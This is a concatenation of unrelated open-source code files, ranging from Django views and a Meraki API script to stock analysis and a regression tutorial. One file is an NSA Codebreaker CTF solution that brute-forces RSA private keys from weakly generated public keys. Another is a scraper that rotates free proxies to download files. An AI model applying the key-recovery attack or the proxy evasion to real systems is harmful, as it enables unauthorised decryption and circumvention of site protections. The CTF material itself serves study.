x.name)\n\t\t\t\n\tunmanagedLists = List.objects.filter(list_type__in=['admin_list']).order_by('name')\n\t\t\n\treturn render(request, \"dashboard_reporting.html\", \n\t{'registration_sessions': reversed(sorted(RegistrationSession.objects.all(), key=lambda rs: lib.registrationCardCodeKey(rs.card_code))), \n\t'managed_lists': sortedManagedLists,\n\t'unmanaged_lists': unmanagedLists,\n\t'query_lists': QueryList.objects.all()})\n\t\n@permission_required('registration.can_run_reports')\ndef report(request):\n\ttry:\n\t\tpeople = parseQueryList(request.GET[\"query\"], \"\\n\")\n\texcept ListParseException as e:\n\t\treturn HttpResponse(\"Error parsing list: %s\" % e.s)\n\t\n\tfields = [field for field in request.GET[\"fields\"].splitlines() if field]\n\t\n\tregistrationSessions = [RegistrationSession.objects.get(card_code=card_code) for card_code in request.GET[\"registration_sessions\"].splitlines() if card_code]\n\t\n\ttry:\n\t\theaders = [HEADERS[f] for f in fields]\n\texcept KeyError:\n\t\treturn HttpResponse(\"There was an invalid field. Please check your query\")\n\t\n\t\n\tdata = reportData(people, fields, registrationSessions)\n\t\n\t\n\tif request.GET['format'] == 'HTML':\t\t\t\n\t\treturn htmlReport(request, headers, data)\n\telif request.GET['format'] == 'Excel':\n\t\treturn excelReport(request, headers, data)\n\n@permission_required('registration.can_run_reports')\ndef person_info(request):\n\tsearch = request.GET.get(\"person_info_search\", None)\n\t\n\tif not search:\n\t\treturn HttpResponseBadRequest(\"person_info_search is required\")\n\t\n\to = lib.codeSearch(search)\n\tperson = lib.autoPerson(o)\n\t\n\tif not person:\n\t\treturn HttpResponseNotFound(\"Person not found for %s\" % search)\n\t\n\ttemplateVars = {}\n\t\n\ttemplateVars[\"person\"] = person\n\t\n\tregistrations = list(person.registration_set.all())\n\tregistrations.sort(key=lambda x: lib.registrationCardCodeKey(x.registration_session.card_code))\n\tregistrations.reverse()\n\ttemplateVars[\"registrations\"] = registrations\n\t\n\tallLists = List.objects.filter(people=person).order_by('name')\n\tentryLists = allLists.filter(list_type='entry_list')\n\tadminLists = allLists.filter(list_type='admin_list')\n\t\n\tqueryLists = []\n\t\n\tfor q in QueryList.objects.all():\n\t\tif person in q.people:\n\t\t\tqueryLists.append(q)\n\tqueryLists.sort(key=lambda q: q.name)\n\t\t\t\n\ttemplateVars[\"entry_lists\"] = entryLists\n\ttemplateVars[\"admin_lists\"] = adminLists\n\ttemplateVars[\"query_lists\"] = queryLists\n\t\n\t\n\treturn render(request, 'dashboard_person_info.html', templateVars)","repo_name":"Hovercross/uconnballroom","sub_path":"dashboard/views/reporting.py","file_name":"reporting.py","file_ext":"py","file_size_in_byte":8849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"11504375291","text":"import csv\r\nfrom datetime import datetime\r\nimport os\r\nfrom pprint import pprint\r\nimport tabulate\r\nimport meraki\r\nimport json\r\n\r\n# Either input your API key below by uncommenting line 10 and changing line 16 to api_key=API_KEY,\r\n# or set an environment variable (preferred) to define your API key. The former is insecure and not recommended.\r\n# For example, in Linux/macOS: export MERAKI_DASHBOARD_API_KEY=093b24e85df15a3e66f1fc359f4c48493eaa1b73\r\n#API_KEY = ''\r\n\r\n\r\ndef main():\r\n # Instantiate a Meraki dashboard API session\r\n dashboard = meraki.DashboardAPI(\r\n api_key='',\r\n base_url='https://api.meraki.com/api/v1/',\r\n output_log=True,\r\n log_file_prefix=os.path.basename(__file__)[:-3],\r\n log_path='',\r\n print_console=False\r\n )\r\n\r\n # Get list of organizations to which API key has access\r\n organizations = dashboard.organizations.getOrganizations()\r\n\r\n # Iterate through list of orgs\r\n for org in organizations:\r\n print()\r\n print('#'*80)\r\n print(f'\\nAnalyzing the organization with a name {org[\"name\"]}:')\r\n print()\r\n print('#'*80)\r\n org_id = org['id']\r\n print('*'*80)\r\n print(\"Found an organization with an id of :\"+org_id+\" with the following networks\")\r\n print()\r\n print('*'*80)\r\n\r\n # Get list of networks in organization\r\n try:\r\n networks = dashboard.organizations.getOrganizationNetworks(org_id)\r\n headers = [\"Network Name\", \"ID\", \"Tags\"]\r\n table = list()\r\n\r\n for net in networks:\r\n tr = [net.get('name'), net.get('organizationId'), net.get('tags')]\r\n table.append(tr)\r\n try:\r\n \r\n print(tabulate.tabulate(table, headers, tablefmt=\"fancy_grid\"))\r\n except UnicodeEncodeError:\r\n print(tabulate.tabulate(table, headers, tablefmt=\"grid\"))\r\n\r\n except meraki.APIError as e:\r\n print(f'Meraki API error: {e}')\r\n print(f'status code = {e.status}')\r\n print(f'reason = {e.reason}')\r\n print(f'error = {e.message}')\r\n continue\r\n except Exception as e:\r\n print(f'some other error: {e}')\r\n continue\r\n \r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n start_time = datetime.now()\r\n main()\r\n end_time = datetime.now()\r\n print(f'\\nScript complete, total runtime {end_time - start_time}')\r\n","repo_name":"DeplorableJed/SASE","sub_path":"Meraki/list_orgs_networks.py","file_name":"list_orgs_networks.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"16162247557","text":"#!/usr/bin/env python3\n\nfrom Crypto.PublicKey import RSA\nimport argparse\nimport base64\nimport json\nimport hashlib\nimport sympy\nimport util\n\ndefault_keyparams = {\n \"256\": {\n \"params\": {\n \"privkey\": \"\",\n \"pubkey\":\n \"-----BEGIN PUBLIC KEY-----\\nMDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAL3q7biU1tvH+280YFAetHj2AdynPE0F\\n3m29lGXiz7ABAgMBAAE=\\n-----END PUBLIC KEY-----\\n\",\n \"r1\": \"E+3pDVN853hZnbloDQq2cuZNSf6+egdQLxm3lxg9Kso=\",\n \"r2\": \"aUfuNx47CquEh78rf2a1rzxrgquj3lIRDoMUx04gPH0=\"\n }\n },\n \"512\": {\n \"params\": {\n \"privkey\":\n \"\",\n \"pubkey\":\n \"-----BEGIN PUBLIC KEY-----\\nMFswDQYJKoZIhvcNAQEBBQADSgAwRwJAId7KyhItIk+zWp2L7rEKURr94WGgv1pa\\nFyjGzFsblUpwEZid6vO3be4qvyOD34RpuZabZBjUT7EvsVhMejFj4QIDAQAB\\n-----END PUBLIC KEY-----\\n\",\n \"r1\":\n \"JNFP6sk10OqdMsJitbYPX6X+yGMYCfRhvfBAq/e4Q+j1w/xRW7iCGPfqh/zzN3Z5ChipkdB4qu+lh28ya6NWKQ==\",\n \"r2\":\n \"JH5XXqQVFd2lWwZgLrNrGpuz7AZXckaC3ve+Iyzmvz2/cPm7ltMHy0UWvb+L4pO8bF3qIfV+c/0LZPC3/1qFaw==\"\n }\n },\n \"1024\": {\n \"params\": {\n \"privkey\":\n \"\",\n \"pubkey\":\n \"-----BEGIN PUBLIC KEY-----\\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgDg7pAaqadA1GiOkS3r9Eh17Lw+6\\n0ZgGd9zM0IGGUkLLbEoJOvwNSZ7MxU0tl/JX3U39oB/MCA/cimBept6GEIvB4OPr\\nviWzyWoQ3iDgJUDbrAZAz4pTPX/NmQskNga0y9sem1Rbxq80i3AZ9wcjJ0SYSoEV\\n1PCa4HOyj3DDEkj3AgMBAAE=\\n-----END PUBLIC KEY-----\\n\",\n \"r1\":\n \"HgXs0Dzbwl1oBPPsZw4RLAM1RyqxiNu4glAbkIejyW9aB+pI911saiAT2DcXXukCqAWHdpHG4BAWL8mIQve+03ZOiXkadaYYN6W1TETWmEsziXlWu2lPeuuMvq5lRBADMW/JM8pwO8ykqIAnyb4DjaMYzIjA1IMRYOHP7w7jhRY=\",\n \"r2\":\n \"P72R/c2IGTIjZFw38tFsUaJ7KIJDDIN7UeRBVzrY6066PTw3ojx8opPie6tInY3VuMw71QU3btegfpcHEyao2vOp6ENAaInqNna/wHiNmDDj3tO5wNvNe58Lt+p+L3IjdxAK4V0Vaws7f8tB27iK/AEeKdDAn2xtjgUerQXpYqI=\"\n }\n }\n}\n\n\nclass Keyparams(object):\n def __init__(self, keyparams):\n self.data = keyparams\n\n def get_privkey(self, keysize):\n return self.data[str(keysize)]['params']['privkey']\n\n def get_pubkey(self, keysize):\n return self.data[str(keysize)]['params']['pubkey']\n\n def get_r1(self, keysize):\n return self.data[str(keysize)]['params']['r1']\n\n def get_r2(self, keysize):\n return self.data[str(keysize)]['params']['r2']\n\n def set_privkey(self, keysize, privkey):\n self.data[str(keysize)]['params']['privkey'] = privkey.exportKey(\n 'PEM').decode('ascii')\n\n\ndef get_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-p',\n '--pubkey',\n dest='pubkey_filename',\n help='The public key (RSA-512, RSA-1024, RSA-2048) file name')\n parser.add_argument('-k',\n '--keyparams',\n dest='keyparams',\n help='The key params file name')\n parser.add_argument('-o',\n '--output',\n dest='output_filename',\n help='The output file name')\n options = parser.parse_args()\n if not options.pubkey_filename:\n parser.error(\n '[-] Please specify the public key file name, use --help for more info.'\n )\n if not options.output_filename:\n parser.error(\n '[-] Please specify the output file name, use --help for more info.'\n )\n return options\n\n\ndef init(keyparams):\n # use https://www.alpertron.com.ar/ECM.HTM to find the prime factors of n_256\n p = 260102157123667008590537578252202112167\n pubkey = RSA.importKey(keyparams.get_pubkey(256))\n privkey = util.rsa_construct_private_key(p, pubkey)\n if privkey:\n keyparams.set_privkey(256, privkey)\n return keyparams\n\n\ndef bytes_xor(a_bytes, b_bytes):\n min_len = len(a_bytes)\n result = bytearray(b_bytes)\n if min_len > len(b_bytes):\n min_len = len(b_bytes)\n result = a_bytes[:]\n for i in range(0, min_len):\n result[i] = a_bytes[i] ^ b_bytes[i]\n return result\n\n\ndef permute_r_key(r, keysize):\n r_bytes = util.to_bytes(r)\n if keysize == 512:\n return util.to_number(hashlib.sha256(r_bytes).digest())\n elif keysize == 1024:\n return util.to_number(hashlib.sha512(r_bytes).digest())\n elif keysize == 2048:\n first_hash = hashlib.sha512(r_bytes).digest()\n second_hash = hashlib.sha512(first_hash).digest()\n return util.to_number(first_hash + second_hash)\n else:\n print('[-] Cannot permute r key')\n return None\n\n\ndef determine_key_size(pubkey):\n keysize = pubkey.size()\n if keysize < 384:\n keysize = 256\n elif keysize < 768:\n keysize = 512\n elif keysize < 1536:\n keysize = 1024\n else:\n keysize = 2048\n return keysize\n\n\ndef recover_privkey_helper(pubkey, keysize, keyparams):\n print('[*] [RSA-%d] Finding the prime number p...' % keysize)\n n_bytes = util.to_bytes(pubkey.n)\n\n kp_keysize = keysize // 2\n kp_pubkey = RSA.importKey(keyparams.get_pubkey(kp_keysize))\n kp_r2_bytes = base64.b64decode(keyparams.get_r2(kp_keysize))\n kp_r2 = util.to_number(kp_r2_bytes)\n kp_privkey = RSA.importKey(keyparams.get_privkey(kp_keysize))\n\n encrypted_p_xor_r1_xor_r2 = n_bytes[0:len(kp_r2_bytes)]\n original_kp_r1_bytes = base64.b64decode(keyparams.get_r1(kp_keysize))\n\n for i in range(0, 0xffffff):\n kp_r2_bytes = util.to_bytes(kp_r2)\n encrypted_p_xor_r1 = bytes_xor(encrypted_p_xor_r1_xor_r2, kp_r2_bytes)\n p_xor_r1_bytes = util.rsa_decrypt(kp_privkey,\n bytes(encrypted_p_xor_r1))\n kp_r1 = util.to_number(original_kp_r1_bytes)\n for j in range(0, 0xa):\n for k in range(0, 0xa):\n kp_r1_bytes = util.to_bytes(kp_r1)\n p_bytes = bytes_xor(p_xor_r1_bytes, kp_r1_bytes)\n p = util.to_number(p_bytes)\n util.print_message('[RSA-%d] [%d:%d:%d] %d' %\n (keysize, i, j, k, p))\n if sympy.isprime(p) and sympy.isprime((p - 1) // 2):\n privkey = util.rsa_construct_private_key(p, pubkey)\n if privkey:\n print('\\n[+] [RSA-%d] p = %d' % (keysize, p))\n print('[+] [RSA-%d] Private key is recovered' %\n keysize)\n return privkey\n kp_r1 += 1\n kp_r1 = permute_r_key(kp_r1, keysize)\n kp_r2 += 1\n print('\\n[-] [RSA-%d] Cannot recover the private key' % keysize)\n return None\n\n\ndef recover_privkey(pubkey, keyparams):\n keysize = determine_key_size(pubkey)\n kp_keysize = 512\n while kp_keysize < keysize:\n kp_privkey = keyparams.get_privkey(kp_keysize)\n if kp_privkey == \"\":\n print('[*] Recovering keyparams...')\n kp_pubkey = RSA.importKey(keyparams.get_pubkey(kp_keysize))\n kp_privkey = recover_privkey_helper(kp_pubkey, kp_keysize,\n keyparams)\n if kp_privkey:\n keyparams.set_privkey(kp_keysize, kp_privkey)\n print('')\n else:\n return None\n kp_keysize *= 2\n\n print('[*] Recovering private key...')\n return recover_privkey_helper(pubkey, keysize, keyparams)\n\n\ndef export_keys(pem_pubkey, keyparams, output_filename):\n filename_priv_pem = output_filename + '_priv.pem'\n filename_pub_pem = output_filename + '_pub.pem'\n filename_priv_bin = output_filename + '_priv.bin'\n\n pubkey = RSA.importKey(pem_pubkey)\n privkey = recover_privkey(pubkey, keyparams)\n if privkey:\n util.rsa_write_key_to_pem_file(pubkey, filename_pub_pem)\n util.rsa_write_key_to_pem_file(privkey, filename_priv_pem)\n encrypted_privkey = util.aes_encrypt_ecb('390164',\n privkey.exportKey('PEM'))\n with open(filename_priv_bin, 'wb') as f:\n f.write(encrypted_privkey)\n print('[+] Encrypted private key has been written to file %s' %\n filename_priv_bin)\n return True\n return False\n\n\ndef main():\n options = get_arguments()\n\n print('\\n --:[ TERRORTIME PRIVATE KEY RECOVER ]:--')\n print(' 0x8861\\n')\n\n keyparams = Keyparams(default_keyparams)\n if options.keyparams:\n keyparams = Keyparams(util.read_json_file(options.keyparams))\n\n keyparams = init(keyparams)\n\n with open(options.pubkey_filename, 'r') as f:\n pem_pubkeys = f.read().split(':')\n\n print('[+] %d public keys found in the file %s\\n' %\n (len(pem_pubkeys), options.pubkey_filename))\n\n count = 0\n for i, pem_pubkey in enumerate(pem_pubkeys):\n output_filename = '{0}_{1:02d}'.format(options.output_filename, i + 1)\n is_success = export_keys(pem_pubkey, keyparams, output_filename)\n if is_success:\n count += 1\n print('')\n\n print('[+] %d private key(s) recovered' % count)\n\n\nif __name__ == '__main__':\n main()","repo_name":"t-ho/nsa-codebreaker-2019","sub_path":"task-07/recover_private_key.py","file_name":"recover_private_key.py","file_ext":"py","file_size_in_byte":9137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"73335414235","text":"import io\nimport os\nimport re\nimport zipfile\nfrom datetime import datetime\n\nimport requests\nfrom lxml.html import document_fromstring\n\nfrom var_dev import env, product\n\n\ndef write_to_html(text):\n with open(\"html.txt\", \"w\", encoding=\"utf-8\") as w:\n w.write(text)\n\n\ndef read_html_file():\n with open(\"html.txt\", \"r\") as r:\n _html = r.read()\n return _html\n\n\ndef send_request(url):\n r = requests.get(url)\n assert r.status_code == 200\n return r.text\n\n\ndef get_items_one_page(number_page, __type, __cate):\n _url = product.base_url_cate.format(number_page, __type, __cate)\n print(_url)\n _html = send_request(_url)\n items = get_urls_img(_html)\n return sorted_items(items)\n\n\ndef sorted_items(__items):\n return sorted(__items, key=lambda x: list(x.keys())[0])\n\n\ndef filter_premium(_divs):\n return [item for item in _divs if item.get(\"data-multi\") != \"premium\"]\n\n\ndef get_urls_img(html):\n doc = document_fromstring(html)\n _divs = doc.find_class(\"showcase__item\")\n assert len(_divs) > 0\n _divs = filter_premium(_divs)\n _rs = list(map(lambda x: get_data_name_and_id(x), _divs))\n return _rs\n\n\ndef get_data_name_and_id(__item):\n __url_img = __item.get(\"data-image\")\n _name = get_name_of_item(__url_img)\n _id = __item.get(\"data-id\")\n return {_name: _id}\n\n\ndef get_name_of_item(str_input):\n return str_input.split(\"/\")[-1].split(\"_\")[0]\n\n\ndef write_downloaded_line(__type, __category, __page, __url):\n _path_dir = env.downloaded_dir.get(__type, None)\n assert _path_dir != None\n _path_to_page_folder = \"{0}{1}/page\".format(_path_dir, __category)\n if not os.path.exists(_path_to_page_folder):\n os.makedirs(_path_to_page_folder)\n\n _path_file = \"{0}/{1}.txt\".format(_path_to_page_folder, __page)\n print(_path_file)\n with open(_path_file, \"a+\") as w:\n w.write(__url + '\\n')\n\n# get_items_one_page(1, \"vector\", \"animals\")\n\n\ndef write_downloaded_line_dock(__page, __category, __type, __url):\n _text = \"{0}__{1}\".format(__page, __url)\n\n _download_dir = env.downloaded_dir.get(__type, None)\n assert _download_dir != None\n\n _path_dir_to_cate = \"{0}{1}\".format(_download_dir, __category)\n\n assert _path_dir_to_cate != None\n\n _path_dir = \"{0}/page/lastest.txt\".format(_path_dir_to_cate)\n with open(_path_dir, \"w\") as w:\n w.write(_text)\n\n\n# write_downloaded_line_dock(1, \"animals\", \"vector\", \"abc\")\n\n\ndef download_a_url(__item_data_download, __type, __category, __page):\n _ = list(__item_data_download.items())\n __item_id = _[0][1]\n __item_name = _[0][0]\n url_to_download = env.base_url_download.format(__item_id)\n # download_file\n download_file(url_to_download, __type, __category, __item_name)\n write_downloaded_line(__type, __category, __page, url_to_download)\n write_downloaded_line_dock(__page, __category, __type, url_to_download)\n\n\ndef change_proxy():\n r = requests.get(\"http://pubproxy.com/api/proxy?https=true\")\n try:\n _data_json = r.json()['data'][0]\n _ip_port = _data_json['ipPort']\n _proxy = \"https://{0}\".format(_ip_port)\n proxy_dict = {\n 'https': _proxy\n }\n return proxy_dict\n except Exception as e:\n print(\"######Exception###### change_proxy\")\n print(\"Khong the change proxy\")\n print(e)\n return None\n\n\ndef download_file(url, __type, __category, folder_name):\n category_path = \"{0}{1}/{2}\".format(env.download_dir, __type, __category)\n if not os.path.exists(category_path):\n os.makedirs(category_path)\n\n proxies = change_proxy()\n print(proxies)\n # assert proxies != None\n # print('b')\n with requests.get(url, proxies = proxies, stream=True) as r:\n assert r.status_code == 200\n z = zipfile.ZipFile(io.BytesIO(r.content))\n z.extractall(\n './download/{0}/{1}/{2}'.format(__type, __category, folder_name))\n\n\n# def download_file(url, __type, __category, folder_name):\n# category_path = \"{0}{1}/{2}\".format(env.download_dir, __type, __category)\n# if not os.path.exists(category_path):\n# os.makedirs(category_path)\n# # assert proxies != None\n# # print('b')\n# with requests.get(url, stream=True) as r:\n# assert r.status_code == 200\n# z = zipfile.ZipFile(io.BytesIO(r.content))\n# z.extractall(\n# './download/{0}/{1}/{2}'.format(__type, __category, folder_name))\n\n\ndef get_info_downloaded(__type, __category, __property):\n \n _download_dir = env.downloaded_dir.get(__type, None)\n assert _download_dir != None\n\n _path_dir_to_cate = \"{0}{1}\".format(_download_dir, __category)\n\n if not os.path.exists(_path_dir_to_cate):\n print(f\"Category :{__category} havent downloaded yet\")\n return None\n\n _path_to_open = \"{0}/page/lastest.txt\".format(_path_dir_to_cate)\n try:\n with open(_path_to_open, 'r') as f:\n __str = f.read()\n __page, __url = get_page_and_url(__str)\n return {\"page\": __page, \"url\": __url}.get(__property, None)\n\n except Exception as e:\n # if file doesnt exist, create file -> write 0 -> return 0\n print(_path_to_open + \" khong ton tai\")\n print(e)\n print(\"#######Creating#######\")\n with open(_path_to_open, \"w\") as w:\n w.write(\"1\")\n return 1\n\ndef get_page_and_url(__str):\n _ = __str.split(\"__\")\n __page = int(_[0])\n __url = _[1]\n return __page, __url\n\ndef find_a_item(__url, last_working_page, __type, __category):\n _page = last_working_page\n\n _page_downloaded = get_info_downloaded(__type, __category, \"page\")\n assert _page_downloaded != None\n\n # If the item is deleted, tool will download next page\n if _page - _page_downloaded == 4:\n return []\n\n _items = get_items_one_page(last_working_page, __type, __category)\n if find_index_of_item(_items, __url) is None:\n find_a_item(__url, _page + 1, __type, __category) # de quy\n\n return _items\n\n\ndef find_index_of_item(__items, __url):\n __id = get_id_from_url(__url)\n for i in range(0,len(__items)):\n if list(__items[i].values())[0] == __id:\n return i\n return None\n\n\ndef get_id_from_url(__url):\n __rs = re.findall(r'\\d', __url)\n return ''.join(__rs)\n\ndef get_download_dock(__type, __category):\n __page_downloaded = get_info_downloaded(__type, __category,\"page\")\n __url = get_info_downloaded(__type, __category, \"url\")\n\n assert __page_downloaded != None and __url != None\n __items = get_items_one_page(__page_downloaded, __type, __category)\n\n try:\n _index = find_index_of_item(__items, __url)\n if _index == len(__items) - 1:\n return [],__page_downloaded\n if not _index is None:\n __items = __items[_index + 1:]\n else:\n __items = get_download_dock_in_exception_case(\n __url, __page_downloaded, __type, __category)\n except ValueError as e:\n print(\"#########EXCEPTION#### get_download_dock\")\n print(e)\n\n return __items, __page_downloaded\n\n\ndef get_download_dock_in_exception_case(__url, last_working_page, __type, __category):\n __items = find_a_item(__url, last_working_page, __type, __category)\n if __items == []:\n return []\n try:\n _index = find_index_of_item(__items, __url)\n if _index == len(__items) - 1:\n return []\n return __items[_index + 1:] if not _index is None else __items\n except Exception as e:\n print(\"#############EXCEPTION###### get_download_dock_in_exception_case\")\n print(e)\n return __items\n\n\ndef download_a_page(__type, __category, mode= \"new\"):\n if mode == \"new\":\n __page = 1\n __data = get_items_one_page(__page, __type, __category)\n for i in __data:\n download_a_url(i, __type, __category, __page)\n \n if mode == \"continue\":\n __items_downloading, _page_downloaded = get_download_dock(__type, __category)\n if __items_downloading != []:\n for __item in __items_downloading:\n download_a_url(__item, __type, __category, _page_downloaded)\n __page = _page_downloaded + 1\n __data = get_items_one_page(__page, __type, __category)\n for i in __data:\n download_a_url(i, __type, __category, __page)\n\n\n\n# try:\n# data = get_items_one_page(1, \"vector\", \"animals\",)\n# download_a_url(data[0], \"vector\", \"animals\", 1)\n# except Exception as e:\n# print(e)\n","repo_name":"jetjokers24895/tool-download-v2","sub_path":"test/api_request.py","file_name":"api_request.py","file_ext":"py","file_size_in_byte":8561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"18132430382","text":"# imports\nfrom pandas_datareader import data, wb\nimport pandas as pd\nimport datetime\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport cufflinks as cf\n\ncf.go_offline()\n\nsns.set_style('whitegrid')\nstart = datetime.datetime(2006, 1, 1)\nend = datetime.datetime(2016, 1, 1)\n# stock information for the following banks:\n# Bank of America\nBAC = data.DataReader(\"BAC\", 'stooq', start, end)\n\n# CitiGroup\nC = data.DataReader(\"C\", 'stooq', start, end)\n\n# Goldman Sachs\nGS = data.DataReader(\"GS\", 'stooq', start, end)\n\n# JPMorgan Chase\nJPM = data.DataReader(\"JPM\", 'stooq', start, end)\n\n# Morgan Stanley\nMS = data.DataReader(\"MS\", 'stooq', start, end)\n\n# Wells Fargo\nWFC = data.DataReader(\"WFC\", 'stooq', start, end)\n\nprint(WFC.head())\n# list of the ticker symbols\ntickers = ['BAC', 'C', 'GS', 'JPM', 'MS', 'WFC']\nbank_stocks = pd.concat([BAC, C, GS, JPM, MS, WFC], axis=1, keys=tickers)\nbank_stocks.columns.names = ['Bank Ticker','Stock Info']\nprint(bank_stocks.head())\n# max Close price for each bank's stock throughout the time period\nbank_stocks.xs(key='Close', axis=1, level='Stock Info').max()\nreturns = pd.DataFrame()\nfor tick in tickers:\n returns[tick + ' Return'] = bank_stocks[tick]['Close'].pct_change()\nprint(returns.head())\nsns.pairplot(data=returns)\nplt.show()\nprint(returns.idxmin())\n# distplot using seaborn of the 2015 returns for Morgan Stanley\nsns.distplot(returns.loc['2015-01-01':'2015-12-31']['MS Return'], bins=50)\nplt.show()\nsns.distplot(returns.loc['2008-01-01':'2008-12-31']['C Return'], bins=50)\nplt.show()\nbank_stocks.xs(key='Close', axis=1, level='Stock Info').plot()\nplt.figure(figsize=(12, 6))\nplt.show()\nBAC['Close'].loc['2008-01-01':'2009-01-01'].rolling(window=30).mean().plot(label='30 Day Avg')\ntc = bank_stocks.xs(key='Close', axis=1, level='Stock Info').corr()\nsns.heatmap(tc, annot=True, cmap='coolwarm')\nplt.show()\n","repo_name":"DempcIzabela/PythonForDataScience","sub_path":"PandasNumPyExcercises/Finanse Project.py","file_name":"Finanse Project.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"11915813484","text":"from hashlib import sha1\nimport os\n\nfrom django.db.models.fields.files import ImageFieldFile\n\n\n__all__ = ('ThumbnailFieldFile', 'ImageWithThumbnailsFieldFile')\n\n\nclass ThumbnailSet(object):\n\n def __init__(self, field_file):\n self.file = field_file\n self.field = self.file.field\n self.instance = self.file.instance\n\n self._cache = {}\n\n def _populate(self):\n if not self._cache and self.file.name and self.instance:\n for options in self.field.thumbnails:\n try:\n attname, renderer, key = options\n except ValueError:\n attname, renderer = options\n key = attname\n ext = '.%s' % renderer.format\n\n name = self.field.get_thumbnail_filename(\n instance=self.instance,\n original_file=self.file,\n thumbnail_name=key,\n ext=ext)\n\n thumbnail = ThumbnailFieldFile(\n attname,\n renderer,\n self.instance,\n self.field,\n name)\n\n self._cache[attname] = thumbnail\n\n def clear_cache(self):\n self._cache = {}\n\n def __getattr__(self, name):\n self._populate()\n\n try:\n return self._cache[name]\n except KeyError:\n return None\n\n def __iter__(self):\n self._populate()\n for attname, value in self._cache.iteritems():\n yield value\n\n\nclass ThumbnailFieldFile(ImageFieldFile):\n\n def __init__(self, attname, renderer, *args, **kwargs):\n self.attname = attname\n self.renderer = renderer\n super(ThumbnailFieldFile, self).__init__(*args, **kwargs)\n\n def save(self):\n raise NotImplemented('Thumbnails cannot be saved directly.')\n\n\nclass ImageWithThumbnailsFieldFile(ImageFieldFile):\n \"\"\"File container for an ``ImageWithThumbnailsField``.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(ImageWithThumbnailsFieldFile, self).__init__(*args, **kwargs)\n self.thumbnails = ThumbnailSet(self)\n\n def save(self, name, content, save=True):\n # set file name to first 8 chars of hash of contents\n _, ext = os.path.splitext(name)\n file_hash = sha1(content.read()).hexdigest()[:8]\n name = file_hash + ext\n\n # save source file\n super(ImageWithThumbnailsFieldFile, self).save(name, content, save)\n\n self.thumbnails.clear_cache()\n\n for thumbnail in self.thumbnails:\n rendered = thumbnail.renderer.generate(content)\n self.field.storage.save(thumbnail.name, rendered)\n\n if save:\n self.instance.save()\n","repo_name":"CondeNast/django-undermythumb","sub_path":"undermythumb/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"50"} +{"seq_id":"3970521425","text":"import json\nimport os\nimport sys\nimport pytest\n\nsys.path.append(\n os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n os.pardir + os.sep + os.pardir\n )\n)\nimport tools\nfrom fixtures import (\n fixture_registry_url,\n fixture_client,\n fixture_repository,\n fixture_delete_tags,\n)\nfrom dregcli.console.delete import DeleteCommandHandler\n\n\nclass TestDeleteExclude:\n @pytest.mark.usefixtures(\n 'fixture_registry_url',\n 'fixture_client',\n 'fixture_repository',\n 'fixture_delete_tags',\n )\n def test_exclude(\n self,\n fixture_registry_url,\n fixture_client,\n fixture_repository,\n fixture_delete_tags,\n capsys\n ):\n # check data set adhoc state\n repo = fixture_client.repositories()[0]\n repo_tags = repo.tags()\n assert sorted(repo_tags) == sorted(fixture_delete_tags)\n\n isolated_tag = 'latest'\n exclude = r\"^{tag}\".format(tag=isolated_tag)\n handler = DeleteCommandHandler()\n deleted = handler.run(fixture_registry_url, fixture_repository, False,\n exclude=exclude)\n\n # check output: others than isolated_tag deleted\n expected_tags_left = fixture_delete_tags.copy()\n expected_tags_left.remove(isolated_tag)\n assert sorted(deleted) == sorted(expected_tags_left)\n\n # check should have isolated_tag left (by exclusion)\n assert repo.tags() == [isolated_tag]\n","repo_name":"anybox/dregcli","sub_path":"dregcli/tests/tests_integration/tests_delete/test_delete_exclude.py","file_name":"test_delete_exclude.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9212922547","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n################# 1. DATAFRAME\n\nfrom sklearn.datasets import load_boston\ndf=load_boston()\ndf\n\n#convert the array into dataframe\ndataset=pd.DataFrame(df.data)\ndataset\n\ndataset.info()\n\n# Adding the missing column names\n\ndataset.columns=df.feature_names\ndataset.head()\n\n\n################# 2. Independent features and dependent features\nX=dataset\ny=df.target\nX\n\n\n################# 3. train test split \n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30, random_state=42) #mostly random_state is kept as 42\nX_train\n\n################# 4.standardizing the dataset\n\"\"\" Standardization is an important technique that is mostly performed as a pre-processing step before many machine learning models, \nto standardize the range of features of an input data set.And to improve the output\n\nBUT-\nLogistic regressions and tree-based algorithms such as decision trees, random forests and gradient boosting are not \nsensitive to the magnitude of variables. So standardization is not needed before fitting these kinds of models.\n\"\"\"\n\nfrom sklearn.preprocessing import StandardScaler\n\nscaler = StandardScaler()\nX_train=scaler.fit_transform(X_train)\nX_test=scaler.transform(X_test)\n\n\n################# 5.Applying Linear Regression Model\nfrom sklearn.linear_model import LinearRegression\n\nregression=LinearRegression()\nregression.fit(X_train,y_train)\n\n\n\n################# 6.Cross Validation - A type of hyper-parameter tuning\n'''Cross-validation is a technique for evaluating ML models by training several ML models on subsets of the available\n input data and evaluating them on the complementary subset of the data. Use cross-validation to detect overfitting, ie,\n failing to generalize a pattern.\n'''\nfrom sklearn.model_selection import cross_val_score\n\nmse=cross_val_score(regression,X_train,y_train,scoring='neg_mean_squared_error',cv=10)\nnp.mean(mse) # as mean is really small no. so its really good -25.550660791660782\n\n\n################# 7.Prediction \nreg_pred=regression.predict(X_test)\nreg_pred\n\n\n######## 8. Checking\n\nimport seaborn as 